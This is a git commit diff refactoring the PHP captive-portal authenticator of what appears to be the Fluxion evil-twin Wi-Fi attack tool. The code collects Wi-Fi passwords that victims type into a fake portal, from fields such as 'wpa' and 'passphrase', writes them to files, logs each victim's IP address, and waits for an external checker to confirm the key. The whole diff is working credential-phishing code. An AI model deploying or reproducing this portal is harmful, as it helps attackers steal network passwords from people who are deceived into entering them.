Improved identifiers & sequencing.
This commit is contained in:
parent
1ff3aae7e2
commit
a2b32f4feb
|
@ -1,67 +1,76 @@
|
||||||
<?php
|
<?php
|
||||||
error_reporting(0);
|
error_reporting(0);
|
||||||
|
|
||||||
/*
|
// Store get & post data to variables.
|
||||||
The following represents the authenticator result.
|
$candidate_key_fields = array(
|
||||||
By default, we assume the password is incorrect.
|
"password",
|
||||||
|
"password1",
|
||||||
|
"passphrase",
|
||||||
|
"key",
|
||||||
|
"key1",
|
||||||
|
"wpa",
|
||||||
|
"wpa_psw");
|
||||||
|
|
||||||
Notice: This variable is used by files including
|
// Get array of keys matching any in $candidate_key_fields.
|
||||||
this script, and by the authenticator itself below.
|
$candidate_key_fields_matches = array_intersect_key($_POST, array_flip($candidate_key_fields));
|
||||||
*/
|
|
||||||
$candidate_code = 0;
|
|
||||||
|
|
||||||
// Receive get & post data and store to variables
|
// Retrieve just the first matched value.
|
||||||
$candidateKeyFields = array("password", "password1", "passphrase", "key", "key1", "wpa", "wpa_psw");
|
$candidate_key = reset($candidate_key_fields_matches);
|
||||||
$matches = array_intersect_key($_POST, array_flip($candidateKeyFields));
|
|
||||||
|
|
||||||
// Retrieve just the first matched value
|
// The following varible represents the authenticator result.
|
||||||
$key = reset($matches);
|
// By default, we assume the password is incorrect (value 0).
|
||||||
|
// WARNING: The variable below is used by external scripts.
|
||||||
|
// That means it MUST be defined before exiting returning.
|
||||||
|
$candidate_key_result = 0;
|
||||||
|
|
||||||
// No password was given
|
// Attempt verification only if a key exists.
|
||||||
if(empty($key)) return;
|
if(!empty($candidate_key))
|
||||||
|
{
|
||||||
|
// Increment hit attempts.
|
||||||
|
$page_hits_log_path = ("$FLUXIONWorkspacePath/hit.txt");
|
||||||
|
$page_hits = file($page_hits_log_path)[0] + 1;
|
||||||
|
$page_hits_log = fopen($page_hits_log_path, "w");
|
||||||
|
fputs($page_hits_log, $page_hits);
|
||||||
|
fclose($page_hits_log);
|
||||||
|
|
||||||
// Update hit attempts
|
// Prepare candidate, and attempt, passwords files' locations.
|
||||||
$page_hits_log_path = ("$FLUXIONWorkspacePath/hit.txt");
|
// Notice: The values in the strings below will be substituted
|
||||||
$page_hits = file($page_hits_log_path)[0] + 1;
|
// by the script once the autheticator script is deployed.
|
||||||
$page_hits_log = fopen($page_hits_log_path, "w");
|
$attempt_log_path = "$FLUXIONWorkspacePath/pwdattempt.txt";
|
||||||
fputs($page_hits_log, $page_hits);
|
$candidate_key_path = "$FLUXIONWorkspacePath/candidate.txt";
|
||||||
fclose($page_hits_log);
|
|
||||||
|
|
||||||
// Prepare candidate and attempt passwords files' locations.
|
$attempt_log_file = fopen($attempt_log_path, "w");
|
||||||
$attempt_log_path = "$FLUXIONWorkspacePath/pwdattempt.txt";
|
fwrite($attempt_log_file, $candidate_key);
|
||||||
$candidate_path = "$FLUXIONWorkspacePath/candidate.txt";
|
fwrite($attempt_log_file, "\n");
|
||||||
|
fclose($attempt_log_file);
|
||||||
|
|
||||||
$attempt_log = fopen($attempt_log_path, "w");
|
// Write candidate key to file to prep for checking.
|
||||||
fwrite($attempt_log, $key);
|
$candidate_key_file = fopen($candidate_key_path, "w");
|
||||||
fwrite($attempt_log, "\n");
|
fwrite($candidate_key_file, $candidate_key);
|
||||||
fclose($attempt_log);
|
fwrite($candidate_key_file, "\n");
|
||||||
|
fclose($candidate_key_file);
|
||||||
|
|
||||||
// Write candidate key to file to prep for checking.
|
// Prepare clients IP log path, and client IP.
|
||||||
$candidate = fopen($candidate_path, "w");
|
$clients_IP_log_path = "/tmp/fluxspace/ip_hits";
|
||||||
fwrite($candidate, $key);
|
$client_IP = $_SERVER['REMOTE_ADDR'];
|
||||||
fwrite($candidate, "\n");
|
|
||||||
fclose($candidate);
|
|
||||||
|
|
||||||
$candidate_result_path = "$FLUXIONWorkspacePath/candidate_result.txt";
|
// Write client IP to log file.
|
||||||
|
$clients_IP_file = fopen($clients_IP_log_path, "w");
|
||||||
|
fwrite($clients_IP_file, $client_IP);
|
||||||
|
fclose($clients_IP_file);
|
||||||
|
|
||||||
// Define variables
|
$candidate_key_result_path = "$FLUXIONWorkspacePath/candidate_result.txt";
|
||||||
$client_ip_path = "/tmp/fluxspace/ip_hits";
|
|
||||||
$client_ip = $_SERVER['REMOTE_ADDR'];
|
|
||||||
|
|
||||||
// Write ip to file
|
// Create candidate result file to trigger checking.
|
||||||
$c = fopen($client_ip_path, "w");
|
$candidate_key_result_file = fopen($candidate_key_result_path, "w");
|
||||||
fwrite($c,$client_ip);
|
fwrite($candidate_key_result_file,"\n");
|
||||||
fclose($c);
|
fclose($candidate_key_result_file);
|
||||||
|
|
||||||
// Create candidate result file to trigger checking.
|
do {
|
||||||
$candidate_result = fopen($candidate_result_path, "w");
|
sleep(1);
|
||||||
fwrite($candidate_result,"\n");
|
$candidate_key_result = trim(file_get_contents($candidate_key_result_path));
|
||||||
fclose($candidate_result);
|
} while (!ctype_digit($candidate_key_result));
|
||||||
|
|
||||||
do {
|
// Reset file by deleting it.
|
||||||
sleep(1);
|
unlink($candidate_key_result_path);
|
||||||
$candidate_code = trim(file_get_contents($candidate_result_path));
|
}
|
||||||
} while (!ctype_digit($candidate_code));
|
|
||||||
|
|
||||||
// Reset file by deleting it.
|
|
||||||
unlink($candidate_result_path);
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
<?php
|
<?php
|
||||||
require_once("authenticator.php");
|
require_once("authenticator.php");
|
||||||
|
|
||||||
switch ($candidate_code) {
|
switch ($candidate_key_result) {
|
||||||
# case "1": header("Location:error.html"); break;
|
# case "1": header("Location:error.html"); break;
|
||||||
case "2": header("Location:final.html"); break;
|
case "2": header("Location:final.html"); break;
|
||||||
default: header("Location:error.html"); break;
|
default: header("Location:error.html"); break;
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
<?php
|
<?php
|
||||||
require_once("authenticator.php");
|
require_once("authenticator.php");
|
||||||
|
|
||||||
switch ($candidate_code) {
|
switch ($candidate_key_result) {
|
||||||
# case "1": echo ""; break;
|
# case "1": echo ""; break;
|
||||||
case "2": echo "authenticated"; break;
|
case "2": echo "authenticated"; break;
|
||||||
# default: echo ""; break;
|
# default: echo ""; break;
|
||||||
|
|
Loading…
Reference in New Issue